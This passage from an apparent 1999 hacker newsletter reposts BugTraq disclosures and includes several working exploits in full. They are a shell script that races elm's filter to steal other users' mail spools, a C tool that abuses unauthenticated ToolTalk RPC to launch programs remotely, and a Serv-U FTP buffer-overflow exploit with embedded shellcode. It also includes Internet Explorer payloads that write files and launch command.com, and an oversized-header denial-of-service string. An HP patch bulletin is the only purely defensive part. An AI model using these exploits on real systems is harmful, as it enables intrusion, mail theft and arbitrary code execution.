echo "created file /tmp/root_was_here" else echo "exploit failed..." fi @HWA 51.0 elm filter program bug ~~~~~~~~~~~~~~~~~~~~~~ Subject: elm filter program To: BUGTRAQ@SECURITYFOCUS.COM Mark Ultor wrote: > I've found a bug in filter on Elm 2.4 PL25. filter got SGID on mail group. > > sowatech:~$ filter -f `perl -e ' print "A" x 5000'` > Segmentation fault "filter" is inherently unsafe. A bug has been described in 1995 which allows reading email of anybody on the system. The description can be found in the BugTraq archives, I believe. I include the full message below. While it was written in 1995, it still works with the filter version of Elm 2.4ME+ PL35 (25) which is from 1997. (I don't know whether there are any more recent elm versions.) --Cornelius. ------cut here------- filter (elm package) security hole David J Meltzer (davem+@andrew.cmu.edu) Tue, 26 Dec 1995 15:07:49 -0500 * Messages sorted by: [ date ][ thread ][ subject ][ author ] * Previous message: Scott Chasin: "Happy Holidays" The elm filter under linux runs sugrp mail, thus allowing it to freely read and write from users mail spools. It is only through the integrity of its code that the security of linux's mail system is protected; and in this respect it falls short. The failure of the filter program to properly handle temporary files allows a user to read or write to any user's mail spool, a significant security hole. The specific problem that is exploited in this hole is the way filter uses a temporary file to store the input to it, and then subsequently send it back out according to the filter. Because of the modularity of the coding, in the main filter.c, the temporary file is opened, and then written to; after which it is closed. The mailmessage function is then called, with the purpose of forwarding that mail, written to the temporary file, to whatever destination is specified in the filter. At the start of this process, the temporary file is opened, and the contents of it are dumped to the mail spool of the user the mail is being forwarded to. At any point after the file has been initially opened by the main filter function, since the user running filter has permissions on that temp file, it can be rm'd. The temp file existing can then be replaced with a symbolic link to any file that group mail has read permissions on. When it is opened in the mailmessage function, the symbolic link is followed and whatever file that was pointed to will be read in, and the contents forwarded to the user specified in the mail spool. The complete exploits are shown below: Program: filter, an elm utility Affected Operating Systems: linux - Slackware 3.0, others with sgid mail filter Requirements: account on machine Security Compromise: user can read any mail spool readable by grp mail. (usually everything, sometimes not root) Author: Dave M. (davem@cmu.edu) Synopsis: filter writes out the mail to be forwarded to a temporary file, which is then closed and reopened; if when the temporary file is reopened it is a symlink to a mail spool, filter will proceed to forward the contents of that file as if it was the original message. ------cut here------- #!/bin/sh # This shell script exploits a problem with filter(1L) # it will follow symbolic links, on a read allowing # us to steal a users mail file. # # Usage: fread.sh victimsusername # # Contents will be stored in ~/victimsusername.mail # # Dave M. (davem@cmu.edu) # cp /var/spool/mail/$LOGNAME ~ cp /dev/null /var/spool/mail/$LOGNAME echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp cat << _EOF_ >> /tmp/fread-msg.tmp From: Dave To: $LOGNAME Subject: Filter Exploit _EOF_ echo sleep 2 > /tmp/fread-sh.tmp echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp chmod +x /tmp/fread-sh.tmp /tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp & FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'` rm -f /tmp/filter.$FREAD ln -s /var/spool/mail/$1 /tmp/filter.$FREAD sleep 2 rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD FREAD= cp /var/spool/mail/$LOGNAME ~/$1.mail cp ~/$LOGNAME /var/spool/mail more ~/$1.mail @HWA 52.0 Accept overflow on Netscape Enterprise Server 3.6 SP2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Nobuo Miwa <n-miwa@LAC.CO.JP> Subject: Accept overflow on Netscape Enterprise Server 3.6 SP2 Hi, I found a vulnerability in "Enterprise 3.6 SP 2 SSL Handshake fix".. I sent a malformed URL to the server and its service was dead. Its URL is following... GET / HTTP/1.0 Accept: aaaaaaaaaaaaaa...2000byte/gif Ofcourse you must be able to execute small code you like with "long Accept" command(just like htr problem on IIS). I've reported this to Netscape on 31st Aug. They've just finished making the patch(maybe SP3). It must be released soon. I'm gonna post this to BUGTRAQ after they release the patch, but someone posted it to some other mailing lists. So I decided to post it to here today. Thanks, Nobuo Miwa(Moderator of BUGTRAQ-JP) *********************************************************************************** Subject: Vulnerability in ttsession To: BUGTRAQ@SECURITYFOCUS.COM Hello, I discovered the following security problem in ttsession, part of CDE: Description ----------- The ToolTalk session daemon ttsession does not properly check client credentials. Impact ------ The insufficient check can lead to compromise of a system from both local and remote with the credentials of the user running ttsession. Note that ttsession is not a system daemon and may not be running all the time. It is normally started as part of an X-session. Also client programs of ttsession may restart the daemon if it can not be found running. Workaround ---------- This problem has only been detected when the ttsession daemon is running with Unix RPC authentication flavor. This is the default. With options this can be changed to, for example, secure-RPC (DES). With CDE it can be configured in /usr/dt/bin/Xsession. Affected systems ---------------- As far as I know, ttsession has been part of OpenWindows (SunOS 4.1.x and Solaris), CDE (Solaris, AIX, HP, OSF/Digital, others?) and IRIX. It looks like most systems running CDE are vulnerable, although the only systems I have checked were: Solaris 7, 2.6, 2.5.1 OSF v4.0 HP-UX B.10.20 AIX 2 4 000096754200 It is unknown what the status with respect to SunOS 4.1.x and SGI is. Background ---------- The ttsession daemon is part of the ToolTalk toolkit and allows applications to send messages to each other. This is achieved by RPC calls. The RPC calls are not properly authenticated. When sniffing a tt_open request to a remote host the following can be seen: host1 -> host2 TCP D=33169 S=38194 Syn Seq=3510273898 Len=0 host2 -> host1 TCP D=38194 S=33169 Syn Ack=3510273899 Seq=914492820 host1 -> host2 TCP D=33169 S=38194 Ack=914492821 Seq=3510273899 host1 -> host2 RPC C XID=932526186 PROG=1289637086 VERS=4 PROC=0 host2 -> host1 TCP D=38194 S=33169 Ack=3510273971 Seq=914492821 host2 -> host1 RPC R (#4) XID=932526186 Success host1 -> host2 RPC C XID=932526185 PROG=1289637086 VERS=4 PROC=400 host2 -> host1 TCP D=38194 S=33169 Ack=3510274043 Seq=914492849 host2 -> host1 RPC R (#7) XID=932526185 Success host1 -> host2 RPC C XID=932526184 PROG=1289637086 VERS=4 PROC=18 host2 -> host1 RPC R (#10) XID=932526184 Success host1 -> host2 RPC C XID=932526183 PROG=1289637086 VERS=4 PROC=11 host2 -> host1 RPC R (#12) XID=932526183 Success host1 -> host2 TCP D=33169 S=38194 Ack=914493001 Seq=3510274267 host1 -> host2 TCP D=33169 S=38194 Fin Ack=914493001 Seq=3510274267 host2 -> host1 TCP D=38194 S=33169 Ack=3510274268 Seq=914493001 host2 -> host1 TCP D=38194 S=33169 Fin Ack=3510274268 Seq=914493001 host1 -> host2 TCP D=33169 S=38194 Ack=914493002 Seq=3510274268 This shows how first the NULL procedure of ttsession is called and next a procedure with number 400. Then procedure 18 and 11 are called. The contents of the reply to the PROC=400 call is something like: host2 -> host1 RPC R (#7) XID=932526185 Success 0: 0800 0000 0000 0800 0000 0000 0800 4500 .. tUb.. .v...E. 16: 0078 b3ab 4000 ff06 a2bf 7f00 0001 7f00 .x..@........... 32: 0001 8191 9532 3682 0db1 d13a 87fb 5018 .....26....:..P. 48: 2238 427e 0000 8000 004c 3795 3869 0000 "8B~.....L7.8i.. 64: 0001 0000 0000 0000 0000 0000 0000 0000 ................ 80: 0000 0000 002d 5020 3031 2031 3831 3736 .....-P 01 18176 96: 2031 3238 3936 3337 3038 3620 3120 3020 1289637086 1 0 112: 3130 3030 2031 302e 302e 302e 3130 2034 1000 10.0.0.10 4 128: 0000 .. This same string can be found in the environment of a shell started as part of a CDE X-session (if it was started by ttsession): TT_SESSION=01 18176 1289637086 1 0 1000 10.0.0.10 4 This is also described in the man page for ttession(1). When this strings is looked at more closely, some aspects can be recognized. The number 1289637086 for example is the RPC program number (Solaris 7). Also the IP of the remote host can be seen (10.0.0.10). The number 18176 is the PID of the ttsession process and 1000 is the uid of the user running ttsession. When playing around with the RPC call to retrieve this string from ttsession, I discovered it doesn't need client credentials to match the user which is running ttsession. Thus anyone can retrieve this string from a ttsession daemon! This combined with the discovery that the string is used by the tt_open call to determine the remote ttsession to connect to leads to the exploit code below. This code uses a message to invoke a dtpad on the host running ttsession. By using some tricks, it makes sure the dtpad is displayed on the requested DISPLAY. Reason why the exploit may fail: When a dtpad has been display on a X-server, it will keep a lock on that server until the dtpad -server process on the remote host has been terminated. Until that time no other dtpads from different hosts can be displayed on that Xserver. Close the X session and log back in again and try again. Regards, Job --- Job de Haas job@itsx.com ITSX bv http://www.itsx.com -------8<----------------------------------------------------------------- /* * ttjamsession.c * Job de Haas * (c) ITSX bv 1999 * * This is a simple ttsession exploit to show some problems with * authentication of a remote user. The possibilities after authentication * are not limited to starting dtpad, but rather any ptype as can be shown * with tt_type_comp. On Solaris this includes dtterm. * * compile with: * cc -L/usr/dt/lib -I/usr/dt/include -I/usr/openwin/include -ltt -lnsl * ttjamsession.c -o ttjamsession * */ #include <stdio.h> #include <stdlib.h> #include <rpc/rpc.h> #include <string.h> #include <netdb.h> #include <arpa/inet.h> #include <pwd.h> #include <Tt/tt_c.h> #include <Tt/tttk.h> #define TTSESSION_PROG 1342177279 #define TTSESSION_PROG_SOL7 1289637086 #define TTSESSION_VERS 3 #define TTSESSION_GETSESSID 400 long rpcprog = TTSESSION_PROG; int version = TTSESSION_VERS; long uid = -1; int use_env = 0; int test = 0; /* * For some reason the string is not returned with xdr_wrapstring. After * some fiddling this seems to work. * */ xdr_mystring(xdrs, objp) register XDR *xdrs; char **objp; { int len; if (!xdr_int(xdrs, &len)) { return 0; } *objp = (char *)malloc(len + 1); if (xdr_opaque(xdrs, (caddr_t)*objp, len)) { (*objp)[len] = '\0'; } else { return 0; } return(1); } /* * This is some generated code by ttsnoop (nice program! at least on sol 2.6) * It was modified a bit to get it to spawn the program on the correct display */ Tt_callback_action process_Instantiate_reply( Tt_message msg, Tt_message pat ); Tt_message create_Instantiate( Tt_message context, char *action ) { Tt_message msg; msg = tttk_message_create( context, TT_REQUEST, TT_SESSION, 0, action, (Tt_message_callback)process_Instantiate_reply ); tt_message_arg_add( msg, TT_IN, "data", "data"); tt_message_context_set( msg, "$DISPLAY", getenv("DISPLAY")); tt_message_disposition_set( msg, TT_START); tt_message_handler_ptype_set( msg, "DTPAD"); return msg; } static Tt_callback_action process_Instantiate_reply( Tt_message msg, Tt_message pat ) { switch (tt_message_state(msg)) { case TT_SENT: /* handler is in this process */ case TT_STARTED:/* intermediate state */ case TT_QUEUED: /* intermediate state */ default: /* unknown state */ return TT_CALLBACK_CONTINUE; case TT_HANDLED: /* ... */ break; case TT_FAILED: { int status; char *string; status = tt_message_status( msg ); string = tt_message_status_string( msg ); printf("message failed with: %s\n",string); /* ... */ } break; } tt_message_destroy( msg ); return TT_CALLBACK_PROCESSED; } /* * The routine to get the remote sessionid string. * */ int get_sessionid( remotehost, port) char *remotehost; ushort port; { struct sockaddr_in server_addr; enum clnt_stat clnt_stat; struct hostent *hp; struct timeval timeout; CLIENT *clnt; int msock; char *buf; char *env; char *hostname; char localhost[MAXHOSTNAMELEN]; memset((char *)&server_addr, 0, sizeof (server_addr)); if (remotehost) { server_addr.sin_family = AF_INET; server_addr.sin_addr.s_addr = inet_addr(remotehost); if ( server_addr.sin_addr.s_addr == -1 ) { if ((hp = gethostbyname(remotehost)) == NULL) { printf("Can't resolve %s\n",remotehost); exit(1); } memcpy((char *)&server_addr.sin_addr, hp->h_addr, hp->h_length); hostname = strdup( remotehost ); } } else { if (gethostname(localhost, MAXHOSTNAMELEN)<0) { perror("gethostname"); exit(1); } if (hp = gethostbyname(localhost)) { memcpy((char *)&server_addr.sin_addr, hp->h_addr, hp->h_length); hostname = strdup( localhost ); } else { server_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); hostname = strdup( "127.0.0.1" ); } } server_addr.sin_family = AF_INET; server_addr.sin_port = htons(port); msock = RPC_ANYSOCK; timeout.tv_sec = 15; timeout.tv_usec = 0; if ( (clnt = (CLIENT *)clnttcp_create(&server_addr, rpcprog, TTSESSION_VERS, &msock, 10000, 10000)) == NULL) { clnt_pcreateerror("clnttcp_create"); exit(1); } /* * apparently credentials are not checked! */ clnt->cl_auth = authunix_create(hostname, 0, 0, 0, NULL); if ((clnt_stat = clnt_call(clnt, TTSESSION_GETSESSID, (xdrproc_t) xdr_void, (caddr_t) 0, (xdrproc_t) xdr_mystring, (caddr_t) &buf, timeout)) != RPC_SUCCESS) { clnt_perror(clnt, "get session"); return(-1); } /* * put TT_SESSION in the environment for tt_open to use. */ env = malloc( strlen("TT_SESSION=") + strlen( buf+2 ) +1); strcpy(env,"TT_SESSION="); strcat(env,buf+2); putenv( env ); printf("Session ID: %s\n", buf); return(0); } usage(progname) char *progname; { fprintf(stderr, "Usage: %s [-p port] [-r rpc prognumber] [-u uid]\n", progname); fprintf(stderr," [-7] [-t] [-e] hostname\n"); fprintf(stderr,"[-7] use Solaris 7 default ttsession program number\n"); fprintf(stderr,"[-t] test the RPC call but not send messages\n"); fprintf(stderr,"[-e] get TT_SESSION from environment (no RPC call)\n"); exit(-1); } int main(argc, argv) int argc; char **argv; { char *hostname = NULL; struct in_addr addr; extern int optind; extern char *optarg; short port = 0; char c, *cp; Tt_message context, msg; char *procid; while ((c = getopt(argc, argv, "u:p:r:7et")) != EOF) { switch (c) { case 'r': rpcprog = atoi(optarg); break; case 'p': port = atoi(optarg); break; case 'u': uid = atoi(optarg); break; case '7': rpcprog = TTSESSION_PROG_SOL7; break; case 'e': use_env = 1; break; case 't': test = 1; break; default: usage(argv[0]); } } if (optind < argc) { hostname = strdup(argv[optind++]); } if (optind < argc) { port = atoi(argv[optind++]); } if (optind < argc) { usage(argv[0]); } /* setup the socket and test correct service */ if ( !use_env && (get_sessionid( hostname, port ) < 0 )) { printf("Failed to properly connect to ttsession\n"); exit(1); } if (test) exit(0); /* * Open up the channel to ttsession. The code uses the TT_SESSION * environment var to figure out how. */ if (((procid = tt_open()) == NULL) || (*procid == '\0')) { perror("tt_open"); exit(1); } /* * Now we can send messages... like instantiate a dtpad! * Two messages are sent to cause a new dtpad -server to be started * so that the dtpad will be displayed on our server even if the local * user is also using dtpad. I use sleep cause I can't seem to trigger * the callback. * */ msg = create_Instantiate(context, NULL); tt_message_send(msg); sleep(10); msg = create_Instantiate(context, "Instantiate"); tt_message_send(msg); sleep(10); /* no idea if I got to wait for the callback */ exit(0); } @HWA 53.0 Serv-U Ver2.5 FTPd Win9x/NT Exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Exploit: Serv-U Ver2.5 FTPd Win9x/NT To: BUGTRAQ@SECURITYFOCUS.COM Hi, "Version 2.5a Released 5 May 1999 * Fixed bug introduced in v2.5 causing crashes with long paths in FTP commands." Upgrade is available at http://www.ftpserv-u.com/. Original thread: http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-04-28&thread=3.0.5.32.19980430122137.008199a0@mail.smartlink.net Max Vision /* FTP Serv-U Version 2.5 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 9000 #define FTP_PORT 21 #define RETADR 164 #define CODEOFS 200 #define FSTACKOFS 174 #define JMPOFS 6 #define MAXUSER 100 #define MAXPASS 100 #define EIP 0xbff7a027 #define FAKESTACK 0x80050101 #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe"; void sendcmd(int sockfd,char *packetbuf) { int i; write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } } int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; char user[MAXUSER],pass[MAXPASS]; int sockfd,i,fakestack,ip,ebp,ins; if (argc<2){ printf("usage\n %s HostName {[username] [password]}\n",argv[0]); exit(1); }else if (argc==4){ strncpy(user,argv[2],MAXUSER-1); strncpy(pass,argv[3],MAXPASS-1); user[MAXUSER-1]=0; pass[MAXPASS-1]=0; }else{ strcpy(user,"anonymous"); strcpy(pass,"hoge@hohoho.com"); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,NOP,BUFSIZE); fakestack=FAKESTACK; for (i=0;i<FSTACKOFS;i+=4){ buf[i ]=fakestack&0xff; buf[i+1]=(fakestack>>8)&0xff; buf[i+2]=(fakestack>>16)&0xff; buf[i+3]=(fakestack>>24)&0xff; } ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[RETADR+4]=JMPS; buf[RETADR+5]=JMPOFS; memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"user %s\r\n",user); sendcmd(sockfd,packetbuf); sprintf(packetbuf,"pass %s\r\n",pass); sendcmd(sockfd,packetbuf); sprintf(packetbuf,"cwd %s\r\n",buf); sendcmd(sockfd,packetbuf); close(sockfd); } @HWA 54.0 HPSBUX9908-102 Security Vulnerability in rpc.cmsd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: [support_feedback@us-support.external.hp.com: Security Bulletins Digest] To: BUGTRAQ@SECURITYFOCUS.COM [support_feedback@us-support.ex1.ems Content-Type: text/plain; charset=us-ascii *** PGP Signature Status: unknown *** Signer: Unknown, Key ID xBE7497F1 *** Signed: 9/9/99 6:01:14 AM *** Verified: 9/13/99 11:56:21 AM *** BEGIN PGP VERIFIED MESSAGE *** ----- Forwarded message from HP Electronic Support Center <support_feedback@us-support.external.hp.com> ----- Date: Thu, 9 Sep 1999 05:07:01 -0700 (PDT) Subject: Security Bulletins Digest From: support_feedback@us-support.external.hp.com (HP Electronic Support Center ) To: security_info@us-support.external.hp.com Reply-To: support_feedback@us-support.external.hp.com Errors-To: support_errors@us-support.external.hp.com HP Support Information Digests =============================================================================== o HP Electronic Support Center World Wide Web Service --------------------------------------------------- If you subscribed through the HP Electronic Support Center and would like to be REMOVED from this mailing list, access the HP Electronic Support Center on the World Wide Web at: http://us-support.external.hp.com Login using your HP Electronic Support Center User ID and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest. =============================================================================== Digest Name: Daily Security Bulletins Digest Created: Thu Sep 9 3:00:02 PDT 1999 Table of Contents: Document ID Title --------------- ----------- HPSBUX9908-102 Security Vulnerability in rpc.cmsd The documents are listed below. ------------------------------------------------------------------------------- Document ID: HPSBUX9908-102 Date Loaded: 19990908 Title: Security Vulnerability in rpc.cmsd ------------------------------------------------------------------------- **REVISED 01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00102, 30 Aug 1999 Last Revised: 08 Sept 1999 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: Buffer overflow vulnerability in the CDE Calendar Manager Service Daemon, rpc.cmsd. PLATFORM: HP-9000 Series 700/800 HP-UX releases 10.2X, 10.30, 11.00. DAMAGE: Allows remote and local users to execute arbitrary code with root privileges. SOLUTION: **REVISED 01** Install the applicable patch. AVAILABILITY: The patches are available now. CHANGE SUMMARY: This revision affects only HP-UX 10.24 (VVOS). ------------------------------------------------------------------------- I. A. Background This problem has been reported in CERT Advisory CA-99-08. B. Fixing the problem - Install the applicable patch: For HP-UX release 10.20 PHSS_19482; ------>>>> For HP-UX release 10.24 PHSS_19702; For HP-UX release 11.00 PHSS_19483. There are significant patch dependencies for these patches. Note: HP-UX release 10.30 was a development release prior to the availability of HP-UX release 11.00. HP-UX release 10.30 will not be patched. C. To subscribe to automatically receive future NEW HP Security Bulletins from the HP Electronic Support Center via electronic mail, do the following: Use your browser to get to the HP Electronic Support Center page at: http://us-support.external.hp.com (for US, Canada, Asia-Pacific, & Latin-America) http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID assigned to you, and your password. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review- bulletins already released from the main Menu, click on the "Search Technical Knowledge Database." Near the bottom of the next page, click on "Browse the HP Security Bulletin Archive". Once in the archive there is another link to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by platform/OS release, and by bulletin topic. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ________________________________________________________________________ -----End of Document ID: HPSBUX9908-102-------------------------------------- ----- End forwarded message ----- -- Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick Pine Internet B.V. PGP key ID BE7497F1 Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- Excuse of the day: Dumb terminal *** END PGP VERIFIED MESSAGE *** @HWA 55.0 IE 5.0 security vulnerabilities - ImportExportFavorites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: IE 5.0 security vulnerabilities - ImportExportFavorites - at least creating and overwriting files, probably executing programs To: BUGTRAQ@SECURITYFOCUS.COM Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95/NT 4.0 (suppose Win98 is vulnerable) allows creating and overwriting local files and in SOME cases putting content in them using the window.external.ImportExportFavorites() method. In SOME cases putting content in the file is possible which means arbitrary programs may be executed. Details: The problem is the window.external.ImportExportFavorites() method, which is used to import and export bookmarks from and to Netscape Communicator. The bigger problem is it allows creating and overwriting files, which obviously leads to a dangerous DoS attack. One may overwrite critical files which may lead to reinstalling Windows. Example of this is: <SCRIPT> window.external.ImportExportFavorites(0,"c:\\fav.hta"); </SCRIPT> which will create a file c:\fav.hta, containing IE's favorites without asking the user, just notifying him the operation is successfull. In SOME cases, HTML code may be injected in the exported file by importing a specially designed HTML file. The file to be imported may reside on a samba or Windows file server and may be accessed by Microsoft Networking. The difficult part is this must be exported by using only the <A> tag, but HTML Applications help again. I have verified importing on a Windows NT 4.0 box directly connected to Internet and it worked fine. But I could not reproduce importing favorites with Windows 95 connected to Internet via dial-up, I do not have enough network resources to investigate further. I SHALL MUCH APPRECIATE SOME NETWORK GURU EXPLAIN ME WHY IMPORTING USING MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES AND CONFIRM OR DENY THE POSSIBLILTY OF IMPORTING FAVORITES FROM A NETWORK FILE SEVER. It is possible to import the file using "http" protocol, but then the user must click the default button YES, Microsoft does not warn about any security problems in this case. So the code looks like this: In a HTML file: ------------------------------------------------------------------ <SCRIPT> // you must change the IP or make the file local !!!!!!!!!! window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp"); // Sure, the StartUp folder is better window.external.ImportExportFavorites(0,"c:\\fav.hta"); </SCRIPT> ------------------------------------------------------------------ In the imported file (fav.imp), residing on a samba or Windows server without authentication: ------------------------------------------------------------------- <!DOCTYPE NETSCAPE-Bookmark-file-1> <DL> <DT><A HREF="#" STYLE="left:expression(eval('f= new ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT created\');window.close();'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A> <DT><A HREF="#" STYLE="left:expression(eval('a=new ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program started\');window.close()'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A> </DL> ------------------------------------------------------------------- To see the effect start c:\fav.hta (it may be placed in the StartUp folder and executed automatically) This vulnerability can be exploited via email or Usenet message using window.open(). The user must have installed file sharing in order remote importing to work. Workaround: Disable Active Scripting Demonstration is available at http://www.nat.bg/~joro/imp.html Regards, Georgi Guninski http://www.nat.bg/~joro Subject: IE 5.0 security vulnerabilities - ImportExportFavorites - at least creating and overwriting files, probably executing programs To: BUGTRAQ@SECURITYFOCUS.COM Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95/NT 4.0 (suppose Win98 is vulnerable) allows creating and overwriting local files and in SOME cases putting content in them using the window.external.ImportExportFavorites() method. In SOME cases putting content in the file is possible which means arbitrary programs may be executed. Details: The problem is the window.external.ImportExportFavorites() method, which is used to import and export bookmarks from and to Netscape Communicator. The bigger problem is it allows creating and overwriting files, which obviously leads to a dangerous DoS attack. One may overwrite critical files which may lead to reinstalling Windows. Example of this is: <SCRIPT> window.external.ImportExportFavorites(0,"c:\\fav.hta"); </SCRIPT> which will create a file c:\fav.hta, containing IE's favorites without asking the user, just notifying him the operation is successfull. In SOME cases, HTML code may be injected in the exported file by importing a specially designed HTML file. The file to be imported may reside on a samba or Windows file server and may be accessed by Microsoft Networking. The difficult part is this must be exported by using only the <A> tag, but HTML Applications help again. I have verified importing on a Windows NT 4.0 box directly connected to Internet and it worked fine. But I could not reproduce importing favorites with Windows 95 connected to Internet via dial-up, I do not have enough network resources to investigate further. I SHALL MUCH APPRECIATE SOME NETWORK GURU EXPLAIN ME WHY IMPORTING USING MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES AND CONFIRM OR DENY THE POSSIBLILTY OF IMPORTING FAVORITES FROM A NETWORK FILE SEVER. It is possible to import the file using "http" protocol, but then the user must click the default button YES, Microsoft does not warn about any security problems in this case. So the code looks like this: In a HTML file: ------------------------------------------------------------------ <SCRIPT> // you must change the IP or make the file local !!!!!!!!!! window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp"); // Sure, the StartUp folder is better window.external.ImportExportFavorites(0,"c:\\fav.hta"); </SCRIPT> ------------------------------------------------------------------ In the imported file (fav.imp), residing on a samba or Windows server without authentication: ------------------------------------------------------------------- <!DOCTYPE NETSCAPE-Bookmark-file-1> <DL> <DT><A HREF="#" STYLE="left:expression(eval('f= new ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT created\');window.close();'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A> <DT><A HREF="#" STYLE="left:expression(eval('a=new ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program started\');window.close()'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A> </DL> ------------------------------------------------------------------- To see the effect start c:\fav.hta (it may be placed in the StartUp folder and executed automatically) This vulnerability can be exploited via email or Usenet message using window.open(). The user must have installed file sharing in order remote importing to work. Workaround: Disable Active Scripting Demonstration is available at http://www.nat.bg/~joro/imp.html Regards, Georgi Guninski http://www.nat.bg/~joro @HWA 56.0 libtermcap<2.0.8-15 sploit by typo@scene.at ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> // yet another lame libtermcap<2.0.8-15 